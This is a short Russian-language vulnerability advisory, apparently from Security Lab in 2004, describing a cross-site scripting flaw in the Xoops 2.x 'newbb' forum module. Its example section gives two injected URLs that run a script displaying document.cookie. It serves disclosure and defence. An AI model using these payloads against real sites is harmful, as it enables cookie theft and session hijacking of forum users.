Security Lab

Межсайтовый скриптинг в Xoops в 'newbb’ модуле

Дата публикации:28.01.2004
Всего просмотров:2105
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Xoops 2.x

Описание: Уязвимость обнаружена в Xoops в 'newbb’ модуле. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/modules/newbb/viewtopic.php?topic_id=14577&forum=2"><script>alert(document.cookie);</script>

http://[target]/modules/newbb/viewtopic.php?topic_id=14577"><script>alert(document.cookie);</script>&forum=2

URL производителя:http://xoops.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Xoops newbb module XSS vulnerability